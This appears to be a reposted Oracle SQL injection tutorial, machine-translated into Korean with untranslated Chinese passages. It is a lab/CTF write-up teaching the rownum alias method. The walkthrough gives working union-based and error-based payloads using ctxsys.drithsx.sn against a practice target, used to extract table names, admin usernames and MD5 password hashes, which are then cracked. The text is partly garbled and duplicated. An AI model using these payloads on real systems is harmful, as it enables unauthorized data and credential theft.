Oracle 데이터베이스 인젝션에서 별칭(Alias) 방식을 사용하는 자세한 예

WBOY
풀어 주다: 2022-05-07 21:35:41
앞으로
2292명이 탐색했습니다.

이 기사는 Oracle에 대한 관련 지식을 제공하며, Oracle 쿼리 정보의 기본 설명, rownum의 특성 등을 포함하여 Oracle 데이터베이스 주입에서 별칭 메서드 사용에 대한 자세한 설명을 주로 다음과 같이 소개합니다. 함께 보시고, 모두에게 도움이 되었으면 좋겠습니다.

Oracle 데이터베이스 인젝션에서 별칭(Alias) 방식을 사용하는 자세한 예

추천 튜토리얼: "Oracle Video Tutorial"

1. Oracle Database 소개

Oracle Database, Oracle RDBMS 또는 줄여서 Oracle이라고도 합니다. 본 데이터베이스는 오라클의 제품으로, 강력한 기능과 복잡한 운영을 갖추고 있으며, 사용은 무료이나 서비스는 유료이며, 은행, 금융기관, 국내 기업 등이 일반적으로 사용하고 있습니다. 빅데이터 산업.

Oracle 기능 요약:
1. Oracle은 정보를 얻기 위해 쿼리 언어를 사용할 때 테이블 이름을 따라야 합니다. 이는 Access와 유사하며 테이블이 없으면 Dual 테이블을 사용할 수 있습니다. 이는 select 구문을 구성하는 데 사용됩니다. 규칙에 따라 Oracle은 이중에 항상 하나의 레코드만 있음을 보장합니다. 직접 쿼리하면 해당 위치의 데이터 유형이 다음의 데이터 유형과 일치합니다. NULL은 빠르게 추측할 수 없는 일부 데이터 형식 위치를 바꾸는 데에도 사용할 수 있습니다. 이는 SQL Server와 유사합니다. 3. Oracle은 mysql과 다릅니다. 페이징에는 제한이 없지만 3계층 쿼리 중첩을 사용하여 페이징을 구현합니다. 4. Oracle의 한 줄 주석 기호는 여러 줄의 주석 기호입니다. 테이블 이러한 시스템 테이블은 user_tab_columns, all_tab_columns, all_tables, user_tables와 같은 시스템 데이터베이스의 테이블 이름과 열 이름을 저장합니다. 여기서 table_name은 시스템의 테이블 이름을 나타냅니다. , column_name은 시스템에 존재하는 열 이름입니다.
6. Oracle은 연결 문자열(URL에서 인코딩으로 표시)을 사용하며, 함수는 두 문자열의 연결을 실현할 수도 있습니다. 약화, 유저가 강화되었으며, 주로 유저로 구분됩니다. 간단히 이해하면 현재 사용자 이름은 다른 데이터베이스의 라이브러리 이름과 동일합니다.



2. 별칭 소개


(1) Oracle 쿼리 정보에 대한 기본 명령문

select * from all_tables 모든 테이블 쿼리

select * from user_tables Query All 현재 사용자의 테이블

select * from all_tab_columns 모든 필드 쿼리

select * from user_tab_columns 현재 사용자의 필드 쿼리select * from all_tables 查询所有的表
select * from user_tables 查询当前用户的所有表
select * from all_tab_columns 查询所有字段
select * from user_tab_columns 查询当前用户的字段
select * from v$version 查当前使用的Oracle版本

(二)rownum的特性

由于在Oracle中不存在limit,所以查询特定的数据需要用rownum来进行选择。比如先输入:
select * from all_tables
Oracle 데이터베이스 인젝션에서 별칭(Alias) 방식을 사용하는 자세한 예
看到页面输出了相当多的数据,但是大部分都不是我们需要的,那么假设我只想要前4条数据,那么修改语句如下:
select * from all_tables where rownum<code>select * from v$version 현재 사용중인 Oracle 버전 확인 <br><img src="https://img.php.cn/upload/article/000/000/067/a290750748b99d965d0baa9b5c7497da-1.png" alt="Oracle 데이터베이스 인젝션에서 별칭(Alias) 방식을 사용하는 자세한 예"> (2) rownum의 특징 <br><br> Oracle에서는 제한이 없기 때문에 특정 데이터를 조회할 때 rownum을 이용하여 선택해야 합니다. 예를 들어 먼저 다음을 입력합니다.

select * from all_tables🎜여기에 그림 설명 삽입🎜 페이지에서 많은 데이터가 출력되지만 대부분은 필요한 데이터가 아니라는 것을 알 수 있습니다. 따라서 처음 4개의 데이터만 원한다고 가정하고 다음과 같이 명령문을 수정합니다. : 🎜select * from all_tables where rownum🎜🎜🎜 그러면 두 번째 데이터만 필요하다고 가정하면 rownum=2인 곳에 입력할 수 있나요? 캔트. rownum은 테이블의 필드 이름이 아니라 쿼리 결과의 행 번호가 쿼리에 결과가 나올 때마다 첫 번째 행, 두 번째 행, 세 번째 행 등이 기본값이 되기 때문입니다. 이 rownum은 행 번호이며, 특정 필드에 속하지 않으므로 rownum은 항상 1로 시작하는 의사 예이고, rownum>n이며, n>1이면 조건을 성립할 수 없습니다. 이러한 상황에서는 부등식 방법과 별칭 방법이라는 두 가지 방법을 사용할 수 있습니다. 🎜 쿼리문을 사용할 때 테이블이나 중간 레코드의 처음 n개 레코드를 반환하도록 요청하는 경우가 많습니다. 예를 들어 큰 테이블(1W의 데이터가 있다고 가정)에서는 1000번째부터 1005번째 레코드까지 쿼리해야 합니다. 이런 종류의 질문에 직면했을 때, 우리는 어떻게 해야 합니까? 각 데이터베이스에는 고유한 솔루션이 있습니다. 예를 들어 mysql에서는 결과를 페이징하는 데 Limit 명령을 사용하고, MSSQL에서는 TOP을 사용하여 결과를 페이징하며, Oracle은 이 문제를 해결하기 위해 주로 rownum 명령을 사용합니다. 오라클에서 특정 데이터를 출력하는 방법을 살펴보겠습니다. 🎜<h2>(3) 같지 않은 방법</h2> <p>온라인 oracle 드릴 플랫폼에 다음 명령을 입력하세요(여기서는 현재 사용자의 모든 필드를 쿼리하는 것입니다): <br><code>select* from user_tab_columnsselect* from user_tab_columns
Oracle 데이터베이스 인젝션에서 별칭(Alias) 방식을 사용하는 자세한 예
结果中显示了当前的所有表和和相应的字段名,假如我只想显示ADMIN表中的内容,可以输入:
select* from user_tab_columns where table_name='ADMIN'
Oracle 데이터베이스 인젝션에서 별칭(Alias) 방식을 사용하는 자세한 예
假如我只想显示第二条数据,该怎么输入呢?直接加个条件rownum=2显然是不行的,这里就可以利用不等法来查询了:
select* from user_tab_columns where table_name='ADMIN' and COLUMN_NAME'UNAME
Oracle 데이터베이스 인젝션에서 별칭(Alias) 방식을 사용하는 자세한 예
从这里我们也可以看出,不等于法是存在弊端的,只有当数据量非常少时,才可以用这种方法。当数据量非常大时,就需要用到下面介绍的别名法了。

(四)别名法

来看一下这个语句:
select column_name,rownum n from user_tab_columns
Oracle 데이터베이스 인젝션에서 별칭(Alias) 방식을 사용하는 자세한 예
这句话执行查询列名以后,会把查询结果从上到下从1开始按顺序进行编号,但是由于rownum本身不是字段,所以这里起了个别名为n。这样这个查询语句的作用就是:查询列名及每个列名对应的行号,并将行号统一存储在n这个字段里面。
注意这个时候虽然我们新建了一个字段n用来存储行号,但是此时如果马上在后面加上一个条件,比如where n=7是不行的,因为这条语句需要执行完才有n这个字段,所以想要用n这个字段来查询信息的话,就需要把这个语句作为一个整体,放在其他语句的子查询里,这样句子执行完了,有n这个字段了,然后才能被其他句子使用。
现在我们先查询ADMIN表里面有几个字段,这么输入:
select column_name,rownum n from user_tab_columns where table_name='ADMIN'여기에 그림 설명 삽입
결과에는 현재 테이블과 해당 필드 이름이 모두 표시됩니다. ADMIN 테이블의 내용을 표시하려면 다음을 입력하면 됩니다. Oracle 데이터베이스 인젝션에서 별칭(Alias) 방식을 사용하는 자세한 예select* from user_tab_columns where table_name='ADMIN'
여기에 이미지 설명 삽입
두 번째 데이터만 표시하고 싶은 경우 어떻게 입력해야 하나요? rownum=2 조건을 직접 추가하는 것은 분명히 불가능합니다. 여기서 불평등 방법을 사용하여 다음을 쿼리할 수 있습니다.

select* from user_tab_columns where table_name='ADMIN' 및 COLUMN_NAME'UNAME 여기서도 볼 수 있습니다. 부등식 방법에는 단점이 있습니다. 이 방법은 데이터 양이 매우 작은 경우에만 사용할 수 있습니다. 데이터의 양이 매우 많은 경우에는 아래에 소개된 앨리어싱 방법을 사용해야 합니다. select column_name,rownum n from user_tab_columns여기에 그림 설명 삽입 쿼리 열 이름을 실행한 후 쿼리 결과는 1부터 시작하여 위에서 아래로 순서대로 번호가 매겨지지만 rownum 이후 그 자체는 필드가 아니며 여기서는 n이라는 별명이 붙었습니다. 이와 같이, 이 쿼리문의 기능은 컬럼 이름과 각 컬럼 이름에 해당하는 행 번호를 쿼리하고, 해당 행 번호를 n 필드에 균일하게 저장하는 것입니다. 이번에는 행 번호를 저장하기 위해 새 필드 n을 생성했지만, 이 명령문은 필드 이전에 실행되어야 하기 때문에 n=7과 같이 바로 뒤에 조건을 추가하면 작동하지 않습니다. n 을 사용할 수 있으므로 n 필드를 사용하여 정보를 쿼리하려면 이 명령문을 다른 명령문의 하위 쿼리에 전체적으로 넣어야 합니다. , 그리고 다른 문장에서도 사용될 수 있습니다. 이제 ADMIN 테이블에 필드가 몇 개 있는지 쿼리해 보겠습니다. 여기 쿼리 결과는 두 개의 필드 이름을 가져옵니다. . 줄 번호는 우리가 가져온 별칭 n이므로 첫 번째 필드는 실제 필드 이름이고 두 번째 필드는 우리가 가져온 별칭 n입니다. 예를 들어 하위 쿼리의 결과는 다음과 같습니다. 필드 이름행 번호aa1bb
(4) Alias ​​​​method 이 문장을 보세요:
select column_name,rownum n from user_tab_columns where table_name='ADMIN'
🎜2🎜🎜🎜 🎜cc🎜🎜3🎜🎜 🎜🎜dd 🎜🎜4🎜🎜🎜🎜

그런 다음 다음을 입력하세요.
n=2인 하위 쿼리에서 *를 선택하면 데이터 bb를 얻을 수 있습니다. 마찬가지로 원하는 데이터에 대해 n을 해당 숫자와 동일하게 만드세요.
따라서 이 문장을 하위 쿼리로 작성하고 외부 쿼리문을 사용하여 이 하위 쿼리의 결과를 쿼리하고 n=2로 설정하면 두 번째 필드를 얻을 수 있으므로 다음을 입력하십시오.
select * from (user_tab_columns에서 컬럼 이름, 행 번호 n 선택, 여기서 table_name='ADMIN')여기서 n=2select * from (select column_name,rownum n from user_tab_columns where table_name='ADMIN')where n=2
Oracle 데이터베이스 인젝션에서 별칭(Alias) 방식을 사용하는 자세한 예
成功查询到第二个字段。
注意:别名法给rownum取名为n时,标准的写法是用rownum as n ,简洁一点是直接rownum n,中间用空格隔开即可。
查询字段的时候可以用别名法,那么查询表名的时候可以用吗?答案是肯定的。
举例:
select table_name,rownum n from user_tables
Oracle 데이터베이스 인젝션에서 별칭(Alias) 방식을 사용하는 자세한 예
可见给表起别名和给字段起别名是一样的,用法实际上也差不多,这里不再赘述。


三、靶场实操

上面讲的只是理论基础,实际操作的时候就没那么容易了,我们找个靶场来实际操作一下看看。
以封神台为例,地址在http://o1.lab.aqlab.cn/?id=1

(一)判断是否SQL注入

进入靶场,看到地址栏有GET传参,当然是先试一下是否存在SQL输入了:
在id=1后面输入:
and 1=1 ,页面回显正常
and 1=2 ,页面回显异常
把id=1改成id=2-1,页面回显正常。
说明必然存在SQL注入。

(二)查询当前页面字段数

实战中,我们并不知道目标网站是什么数据库,所以何必管那么多,当成MYSQL来搞就好了,所以这里先查询字段数:
输入 order by 1 页面回显正常;
输入 order by 5 页面回显异常;
输入 order by 4 页面回显正常;
输入 order by 5여기에 이미지 설명 삽입
두 번째 필드가 성공적으로 쿼리되었습니다.

참고: 별칭 메서드를 사용하여 rownum n의 이름을 지정하는 경우 표준 작성 방식은 rownum을 n으로 지정하는 것입니다. 공백으로 구분하면 됩니다.

필드를 쿼리할 때 별칭 메서드를 사용할 수 있지만 테이블 이름을 쿼리할 때도 사용할 수 있나요? 대답은 '예'입니다.

예:

user_tables에서 table_name,rownum n 선택

여기에 이미지 설명 삽입

테이블 앨리어싱은 필드 앨리어싱과 동일하다는 것을 알 수 있으므로 여기서는 자세히 설명하지 않겠습니다.


3. 사격장에서의 실전

위 내용은 이론적인 내용일 뿐 실제 운용에서는 쉽지 않습니다. Fengshentai를 예로 들면 주소는 http://o1.lab.aqlab.cn/?id=1

(1) SQL 인젝션 여부 판단


사격장을 입력하고 GET 파라미터가 있는지 확인 물론 주소 표시줄에 먼저 SQL 입력이 있는지 확인하십시오.

id=1 이후에 입력:

및 1=1, 페이지 에코가 정상
및 1=2, 페이지 에코가 비정상

변경 id= 1 ~ id=2-1 , 페이지 에코는 정상입니다.

SQL 주입이 있어야 한다는 뜻입니다.


(2) 필드 수 쿼리 현재 페이지

실제 전투에서는 대상 웹사이트가 어떤 데이터베이스인지 알 수 없습니다. 그런데 왜 그렇게 귀찮게 할까요? 그냥 MYSQL로 취급하므로 여기서는 먼저 필드 수를 쿼리합니다.

order를 입력합니다. 1로 입력하면 페이지가 정상적으로 표시됩니다. order by 5를 입력하면 페이지가 비정상적으로 반환됩니다.
order by 4로 입력하면 페이지가 표시됩니다.

order by 5를 입력하면 페이지가 비정상으로 반환됩니다.

현재 페이지의 필드 수가 4개임을 나타냅니다.

(3) 공동 쿼리를 시도해보세요

id=1 다음에 입력:

union all select 1,2,3,4
로그인 후 복사
페이지가 비정상적으로 울립니다. 데이터베이스가 확실히 mysql이 아닌 것 같으니 숫자를 null로 변경해보세요:
union all select null,null,null,null from dual
로그인 후 복사
페이지가 정상적으로 울립니다. 대상 데이터베이스에는 매우 엄격한 문법 요구 사항이 있는 것 같습니다. 이제 4개의 필드가 어떤 데이터 유형인지 확인하겠습니다. 다음을 입력하세요.
union all select 111,null,null,null from dual
로그인 후 복사

페이지가 정상을 반환하여 첫 번째 필드가 숫자 유형임을 나타냅니다. ctrl+u를 눌러 웹페이지의 소스 코드를 보고 111을 검색하면 눈에 띄는 정렬 오류가 없는지 확인할 수 있습니다.

디스플레이 정렬이 잘못되었는지 확인하기 위해 현재 페이지에서 오류를 보고하도록 해보세요.

and 1=2 union all select 111,null,null,null from dual
로그인 후 복사
명백한 디스플레이 정렬이 보이지 않습니다. 계속 입력하세요.
and 1=2 union all select 111,111,null,null from dual
로그인 후 복사
페이지에서 두 번째 필드가 숫자 유형이 아니라는 예외를 반환합니다.

계속 입력하세요.

and 1=2 union all select 111,'aa',null,null from dual
로그인 후 복사
페이지에서 두 번째 필드가 문자열 유형이 아니라는 예외를 반환합니다.

실제로 Oracle 데이터베이스에는 숫자 값, 문자열, 날짜, 바이너리, 큰 텍스트 등 다양한 데이터 유형이 있습니다. 하나씩 세분화된 유형도 있으므로 여기서는 생략하겠습니다. 🎜 세 번째 필드도 마찬가지이며, 숫자도 문자열도 아니며, 눈에 띄는 정렬 오류도 없는 것으로 확인되었습니다. 🎜 계속해서 네 번째 필드인 🎜
and 1=2 union all select 111,null,null,111111 from dual
로그인 후 복사
🎜를 쿼리하면 페이지에 새로운 시간이 표시되는 것을 확인할 수 있습니다. 🎜🎜🎜🎜 이런 시간을 보면 타임스탬프를 생각해야 합니다. 컴퓨터는 1970년 1월 1일 8시부터 초를 세기 시작하기 때문입니다. 🎜🎜 (4) 테이블 이름 쿼리 🎜🎜 오류 주입 기능을 사용하여 정보를 쿼리하고 다음을 입력합니다. 🎜
and 1=ctxsys.drithsx.sn(1,(select table_name from user_tables where rownum=1))
로그인 후 복사
🎜 참고: 오류 주입은 테이블이 아닌 문자열만 반환할 수 있으므로 나중에 제한이 있어야 합니다. 즉, rownum =1, 데이터 행만 가져옵니다. 또한 함수의 괄호 안의 1은 숫자 값이나 문자열 등 다른 값으로 대체될 수 있습니다. 🎜🎜🎜 테이블 이름 🎜ADMIN🎜🎜을 가져오고 계속해서 🎜
and 1=ctxsys.drithsx.sn(1,(select table_name from user_tables where rownum=1 and table_name'ADMIN'))
로그인 후 복사
🎜🎜🎜🎜을 입력하고 두 번째 테이블 🎜NEWS🎜을 가져옵니다. 🎜 다음으로, 다른 테이블을 쿼리할 때 더 이상 부등식 방식을 사용할 수 없습니다. 대신 위에서 언급한 별칭 방식을 사용하여 기본 문장을 구성한 다음, n 값을 수정하여 아직 생성되지 않은 테이블의 이름을 결정합니다. 쿼리됨: 🎜
and 1=ctxsys.drithsx.sn(1,(select table_name from (select table_name,rownum n from user_tables )where n =3))
로그인 후 복사
🎜마지막으로 현재를 결정합니다. 사용자 테이블은 다음과 같습니다: 🎜ADMIN, NEWS, MD5🎜🎜

(五)查询字段名

接下来查询字段,ADMIN表显然更可能有我们想要查询的信息,因此先查询ADMIN表的内容,输入:

and 1=ctxsys.drithsx.sn('a',(select column_name from (select column_name,rownum as n from user_tab_columns) where n=1))
로그인 후 복사


得到第一个字段名为:UNAME
把n改为2继续输入:

and 1=ctxsys.drithsx.sn('a',(select column_name from (select column_name,rownum as n from user_tab_columns) where n=2))
로그인 후 복사


得到第二个字段为UPASS
把n改为3,继续输入:

and 1=ctxsys.drithsx.sn('a',(select column_name from (select column_name,rownum as n from user_tab_columns) where n=3))
로그인 후 복사


得到第三个字段为MD5
把n改为4,继续输入:

and 1=ctxsys.drithsx.sn('a',(select column_name from (select column_name,rownum as n from user_tab_columns) where n=4))
로그인 후 복사

没有结果了。可见ADMIN表中的字段为:UNAME、UPASS、MD5

(六)根据字段查询具体数据

字段和表名都有了,接下来查询具体的数据,为了方便,还是用别名法来查询:

and 1=ctxsys.drithsx.sn(1,(select UNAME from (select UNAME,rownum as n from ADMIN) where n=1))
로그인 후 복사

注意报错函数的特殊性,因此这里不能用*来代替UNAME。
通过改变n的值可以得到UNAME中的全部用户名为:OCI、NF、QQ123。
用同样的方法继续查询UPASS字段的内容,输入:

and 1=ctxsys.drithsx.sn(1,(select UPASS from (select UPASS,rownum as n from ADMIN) where n=1))
로그인 후 복사

改变n的值可以得到UPASS字段的三条记录分别为:
e10adc3949ba59abbe56e057f20f883e
2a61f8bcfe7535eadcfa69eb4406ceb9
654321
在cmd5.com中解密后结果分别为:
123456、未查到、654321

(七)提交flag

把每个md5值都提交到靶场,最终确定flag为:
2a61f8bcfe7535eadcfa69eb4406ceb9


四、小结

渗透测试人员在进行数据库注入时,总是会遇到查询指定数据的问题,对于不同的数据库虽然查询方法大同小异,但是很多细节如果没有搞好是很难完成渗透的,这就需要每一位渗透测试人员夯实理论基础,掌握每一种常用的方法,在面临实际问题的时候才能游刃有余。

本文重点介绍了Oracle数据库的特点以及注入时常用的别名法,分享了别名法在靶场中实操的过程,并分享了一个在线执行Oracle命令的平台希望能够为各位同行或爱好者解决相关问题提供参考。

推荐教程:《Oracle视频教程

위 내용은 Oracle 데이터베이스 인젝션에서 별칭(Alias) 방식을 사용하는 자세한 예의 상세 내용입니다. 자세한 내용은 PHP 중국어 웹사이트의 기타 관련 기사를 참조하세요!

관련 라벨:
원천:csdn.net
본 웹사이트의 성명
본 글의 내용은 네티즌들의 자발적인 기여로 작성되었으며, 저작권은 원저작자에게 있습니다. 본 사이트는 이에 상응하는 법적 책임을 지지 않습니다. 표절이나 침해가 의심되는 콘텐츠를 발견한 경우 admin@php.cn으로 문의하세요.
인기 튜토리얼
더>
최신 다운로드
더>
웹 효과
웹사이트 소스 코드
웹사이트 자료
프론트엔드 템플릿